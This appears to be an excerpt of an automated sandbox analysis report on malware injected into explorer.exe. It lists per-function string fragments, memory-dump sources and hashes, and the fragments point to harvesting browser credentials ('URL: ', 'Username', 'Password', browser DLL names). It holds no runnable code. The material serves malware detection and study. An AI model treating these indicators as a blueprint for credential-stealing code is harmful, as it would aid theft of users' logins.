d, xrefs: 107D86CF
n, xrefs: 107D86C1
d, xrefs: 107D86A5
t, xrefs: 107D86C8
n, xrefs: 107D86BA
l, xrefs: 107D86AC
s, xrefs: 107D8689
i, xrefs: 107D869E
e, xrefs: 107D866D
u, xrefs: 107D8661
w, xrefs: 107D86B3
l, xrefs: 107D86D6
p, xrefs: 107D8690
2, xrefs: 107D8674
c, xrefs: 107D8697
d, xrefs: 107D867B
l, xrefs: 107D8682

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: cfa510817458f8d70c1da8b0344392c7d1dca9d004970add0e3dfd57c2d9edad
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 97419E70A18B088FDB94DF88A84A6AD7BE6FB48700F00025EE449D3345DBB5AD45CBD6

Function 1092F622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

l, xrefs: 1092F6AC
t, xrefs: 1092F6C8
l, xrefs: 1092F682
n, xrefs: 1092F6C1
d, xrefs: 1092F6CF
d, xrefs: 1092F67B
i, xrefs: 1092F69E
d, xrefs: 1092F6A5
2, xrefs: 1092F674
s, xrefs: 1092F689
e, xrefs: 1092F66D
u, xrefs: 1092F661
c, xrefs: 1092F697
n, xrefs: 1092F6BA
w, xrefs: 1092F6B3
l, xrefs: 1092F6D6
p, xrefs: 1092F690

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 8f02ee91e4bad136ac58be7205410c663b536f9f51ebfeb2a3b7dbf3df8ea2ef
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 9541B170A18B08CFDB14DF88A4667BD7BE6FB88700F40026EE409D3245DBB5AD458BD6

Function 0E475AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

l, xrefs: 0E475C35
n, xrefs: 0E475C98
[, xrefs: 0E475C2D
e, xrefs: 0E475CA0
[, xrefs: 0E475BF6
[, xrefs: 0E475C66
[, xrefs: 0E475CCD
[, xrefs: 0E475C90
D, xrefs: 0E475CDA
c, xrefs: 0E475C0B
], xrefs: 0E475CA8
], xrefs: 0E475C3D
b, xrefs: 0E475C73
l, xrefs: 0E475CE2

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 6d0b1813b3a1ba4b3deeeb8784fb26ab40a8a76ada44ff1ea3ea4215575f5875
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 1AC14B70618B098FC758EF28C4996EAF7E5FB98304F404A2F949AC7250DF74A915CBC6

Function 107DFAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

e, xrefs: 107DFCA0
[, xrefs: 107DFBF6
n, xrefs: 107DFC98
c, xrefs: 107DFC0B
[, xrefs: 107DFC2D
D, xrefs: 107DFCDA
[, xrefs: 107DFC90
[, xrefs: 107DFC66
], xrefs: 107DFCA8
b, xrefs: 107DFC73
l, xrefs: 107DFC35
], xrefs: 107DFC3D
l, xrefs: 107DFCE2
[, xrefs: 107DFCCD

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: e57ae20eb0b79ad7a12ff27c01b4094a64bb06ebfbc9ca0c2082106b9f888c0b
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: ADC15A74618B089FC758EF24D88AADAF3E1FB98304F40472AA49EC7211DF70B515CB86

Function 10936AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 10936BF6
[, xrefs: 10936C90
b, xrefs: 10936C73
e, xrefs: 10936CA0
], xrefs: 10936C3D
l, xrefs: 10936C35
c, xrefs: 10936C0B
n, xrefs: 10936C98
l, xrefs: 10936CE2
D, xrefs: 10936CDA
], xrefs: 10936CA8
[, xrefs: 10936C2D
[, xrefs: 10936C66
[, xrefs: 10936CCD

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: ff44a1c08cd06327aa69942d97b1faaa20074d2d173338ed7ce7f8615cb7ea6f
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: E0C15A78218B098FC758EF74D496B9AF3E5FB98305F40472EA49ACB250DF30A515CB86

Function 0E475F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 0E475F63
r, xrefs: 0E475FB0
0, xrefs: 0E475F5B
r, xrefs: 0E475F90
r, xrefs: 0E475FC0
r, xrefs: 0E475F88
r, xrefs: 0E475FA8
r, xrefs: 0E475F98
n, xrefs: 0E475F6B
c, xrefs: 0E475FC8
r, xrefs: 0E475FA0
r, xrefs: 0E475FB8

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: e449bbd8d5340000bd26fedb5b756375869daa9aa873965c609108d864243e30
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 1251D331118B488FD719DF18D8852EAB7E5FB85300F511A6FE8CBC7242DBB49906CB82

Function 107DFF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 107DFFB8
0, xrefs: 107DFF5B
r, xrefs: 107DFFB0
r, xrefs: 107DFF88
r, xrefs: 107DFFC0
c, xrefs: 107DFFC8
r, xrefs: 107DFFA0
n, xrefs: 107DFF6B
r, xrefs: 107DFF98
r, xrefs: 107DFFA8
r, xrefs: 107DFF90
., xrefs: 107DFF63

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 91dae5f1f281d3d364b8de654801bec98d6d1a38dd6769ce47fe8eeb1bd87268
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: F251D7315197488FD71ACF19D8852AAB7E5FBC5700F50192EF8CBC7242DBB49946CB82

Function 10936F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 10936F98
r, xrefs: 10936FB0
r, xrefs: 10936FB8
r, xrefs: 10936FA8
r, xrefs: 10936F90
c, xrefs: 10936FC8
., xrefs: 10936F63
r, xrefs: 10936FC0
0, xrefs: 10936F5B
r, xrefs: 10936F88
n, xrefs: 10936F6B
r, xrefs: 10936FA0

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 8b58e7593079809a9f4cab545d1fbaf7d8320189bbb48c1462817336a0c57123
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 0251C23151C7488FD759CF28C4913AAB7E5FB84301F501A2EE8DB8B241DBB4A9068F82

Function 0E46F2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 0E46F4DB
opera_browser.dll, xrefs: 0E46F629
dragon_s.dll, xrefs: 0E46F614
l, xrefs: 0E46F4E2
dll, xrefs: 0E46F32E
cli., xrefs: 0E46F327
nspr, xrefs: 0E46F4D4
sspi, xrefs: 0E46F320

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 59bbfe5d1b5826cf3d56b8162e9f707cc0c6dbfdb5c3a31ad347476eba35c465
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: B4C1A071618E194FC758EF29D495AEAB3E1FB98300F45472F948AC7254DF30AE0687C6

Function 0E46F2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 0E46F4DB
opera_browser.dll, xrefs: 0E46F629
dragon_s.dll, xrefs: 0E46F614
l, xrefs: 0E46F4E2
dll, xrefs: 0E46F32E
cli., xrefs: 0E46F327
nspr, xrefs: 0E46F4D4
sspi, xrefs: 0E46F320

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 2a453d2ff17066b9c17b7ade43d6b66cecdcb3d97dc3f421123f98e6cc9d3643
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 38C1A070618E194FC758EF69D495AEAB3E1FB98300F45472F948AC7254DF30AE0687C6

Function 107D92F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 107D9614
dll, xrefs: 107D932E
sspi, xrefs: 107D9320
opera_browser.dll, xrefs: 107D9629
l, xrefs: 107D94E2
cli., xrefs: 107D9327
4.dl, xrefs: 107D94DB
nspr, xrefs: 107D94D4

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 2ece2a2526d434b3abeb79a604457c8a1e639968566dd9d18f93f925697a9a7c
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 56C17174618B198FC749EF68E49AAAAB3E1FB98304F514329A44EC7255DF30E902C7C5

Function 107D92F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 107D9614
dll, xrefs: 107D932E
sspi, xrefs: 107D9320
opera_browser.dll, xrefs: 107D9629
l, xrefs: 107D94E2
cli., xrefs: 107D9327
4.dl, xrefs: 107D94DB
nspr, xrefs: 107D94D4

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 5f2a0a9c4d7ec2b08e5fee84b0ad8b0c8c54882c3f343f56fba366e743c09c45
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 66C17074618B198FC749EF68E49AAAAF3E1FB98304F514329A44EC7255DF30E902C7C5

Function 109302F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 109304DB
l, xrefs: 109304E2
dll, xrefs: 1093032E
sspi, xrefs: 10930320
dragon_s.dll, xrefs: 10930614
nspr, xrefs: 109304D4
cli., xrefs: 10930327
opera_browser.dll, xrefs: 10930629

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 629e096de29d1afd9e93a71fec373ebf4900611965ea96982b64d57fd0dff1dc
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 87C18174618A194FC758DB78D466BAAF3E5FB94301F91432DA44ECB254DF30AA01CBC5

Function 109302F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 109304DB
l, xrefs: 109304E2
dll, xrefs: 1093032E
sspi, xrefs: 10930320
dragon_s.dll, xrefs: 10930614
nspr, xrefs: 109304D4
cli., xrefs: 10930327
opera_browser.dll, xrefs: 10930629

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: a6981052c6c2fb7430bc0e5a763d6d771532eac6d7f5455b18599958bc9d99d0
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: E8C19174618A194FC758EB78D466BAAF3E5FB98301F91432DA44ECB254DF30AA01CBC5

Function 0E470CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 0E470D9E
2, xrefs: 0E470DE1
UR, xrefs: 0E470D5F
Pass, xrefs: 0E470D97
User, xrefs: 0E470DAB
name, xrefs: 0E470DB2
L: , xrefs: 0E470D66

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 1f9234199ab8703b5415bf38369bf2fefb4f99d1a178b4e4846b93d91e4dd79b
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E3A18F706187588BDB29EFA8D444BEEB7E1FF88304F404A2FD48AD7251EB7099458789

Function 107DACD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

2, xrefs: 107DADE1
word, xrefs: 107DAD9E
L: , xrefs: 107DAD66
Pass, xrefs: 107DAD97
User, xrefs: 107DADAB
name, xrefs: 107DADB2
UR, xrefs: 107DAD5F

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: d6af27c95c2081c5c7edba02ac69852dafcfc1c77b613b6a08497e59491c4d03
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: CFA190706187488FDB19EFA8A4457EEB7E1FF94300F40462EE48AD7292EF709546C785

Function 10931CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

UR, xrefs: 10931D5F
L: , xrefs: 10931D66
word, xrefs: 10931D9E
name, xrefs: 10931DB2
User, xrefs: 10931DAB
Pass, xrefs: 10931D97
2, xrefs: 10931DE1

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 62f94550bb398d73c362211a391070fb6c6b440c8dd63ca870a6cec5c70c431c
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: EEA1BE706187488BDB19DFA8D4547EEB7F1FF88301F40462EE48ADB291EB709945CB89

Function 0E470CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 0E470D9E
2, xrefs: 0E470DE1
UR, xrefs: 0E470D5F
Pass, xrefs: 0E470D97
User, xrefs: 0E470DAB
name, xrefs: 0E470DB2
L: , xrefs: 0E470D66

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: af062d03fa65ff79b99ff3afdbfb092a8bd04a23cc8d9833b2ff15c9ca97c38c
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: FE917E706187488BDB29EFA8D444BEEB7E1FB98304F40462FE48AD7251EB7099458789

Function 107DACE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 107DADE1
word, xrefs: 107DAD9E
L: , xrefs: 107DAD66
Pass, xrefs: 107DAD97
User, xrefs: 107DADAB
name, xrefs: 107DADB2
UR, xrefs: 107DAD5F

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 5dec80025944a7ce21e7b447f1e495047f32559e987eda690cffd89ef252b154
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 6D919F706187488FDB19DFA8E444BEEB7E1FB98300F40462EE48AD7292EB709546C785

Function 10931CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

UR, xrefs: 10931D5F
L: , xrefs: 10931D66
word, xrefs: 10931D9E
name, xrefs: 10931DB2
User, xrefs: 10931DAB
Pass, xrefs: 10931D97
2, xrefs: 10931DE1

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: dd5cdb8ace79dc2321267006925a4edee9471c31bb9bd2a3d8c1d15ad5afadf6
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: FD919C706187488BDB19DFA8D454BEEB7E1FB88301F00462EE48ADB251EB709545CB89

Function 0E470352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

n, xrefs: 0E4703E7
v, xrefs: 0E4704A0
, xrefs: 0E47047C
., xrefs: 0E4703B0
e, xrefs: 0E47048E

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 41ae733bdb82ce8c0721b5b42cca477b73f0d161f0906b4bec01ae864eed68e9
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 2E715F31618A498FD758EFA9C4886EAB7F1FF58304F00062FD48AD7261EB71A9458B85

Function 107DA352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 107DA47C
v, xrefs: 107DA4A0
e, xrefs: 107DA48E
n, xrefs: 107DA3E7
., xrefs: 107DA3B0

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: e31db947123ca3f9b3d8f28adc5c80cee96c98951f35bf321855fb2cb724fc43
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 92719431618B498FD759EF68D4897AAB7F1FF54304F00062EE44AC7261EB71E945CB81

Function 10931352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 109314A0
n, xrefs: 109313E7
., xrefs: 109313B0
e, xrefs: 1093148E
, xrefs: 1093147C

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 3572bba3c4d68d9c4bfd97322e937fe4cf84c17f6a5ab97b54dd931783615ad0
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: C871A271618B488FD758DFB8C4957AAB7F1FF98305F00062EE44ACB261EB74E9458B81

Function 0E46BC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0E46BC64
dll, xrefs: 0E46BC9E
shel, xrefs: 0E46BC90
l32., xrefs: 0E46BC97
ole3, xrefs: 0E46BC5D

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 2b599a893b5b10b4bc2c758c6730366c5142306ad35d5fe93922b68658f45789
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6A513DB0918B4C8BDB54EF64C0456EEB7F1FF58301F404A2F999AE7214EF7095418B8A

Function 107D5C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 107D5C90
ole3, xrefs: 107D5C5D
l32., xrefs: 107D5C97
dll, xrefs: 107D5C9E
2.dl, xrefs: 107D5C64

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: c9b92eff53088b00e9a14c75fd6fa77bbcc4e7a006a443da1e60c686d3b49e4b
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6C515CB0918B4C8FDB55DFA4D045AEEB7F1FF68300F40462EA49AE7215EF30A5418B89

Function 1092CC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 1092CC97
shel, xrefs: 1092CC90
dll, xrefs: 1092CC9E
ole3, xrefs: 1092CC5D
2.dl, xrefs: 1092CC64

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 0a671807a709d007227061e82bdbdb5d510d7bf7f50bf14ed15a7e2095e1f330
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: CD514DB0914B4C8FDB64DFA4C0557EEB7E1FF58301F40462EA49AEB254EF30A5418B89

